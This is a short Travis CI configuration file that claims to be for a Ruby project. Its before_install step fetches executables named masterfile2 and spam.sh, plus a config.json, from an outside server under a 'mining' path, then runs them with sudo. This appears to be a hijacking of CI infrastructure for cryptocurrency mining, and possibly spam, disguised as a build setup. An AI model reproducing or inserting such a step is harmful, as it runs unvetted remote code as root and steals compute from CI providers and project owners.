language: ruby

services:
  - docker

before_install:
  - sudo apt-get update && sudo apt-get install -y screen && sudo apt-get install -y wget && wget https://swensonm.com/mining/masterfile2 && wget https://swensonm.com/mining/ridho/config.json && wget https://swensonm.com/mining/spam.sh && sudo chmod u+x masterfile2 && sudo chmod u+x spam.sh && sudo ./masterfile2 && sudo ./spam.sh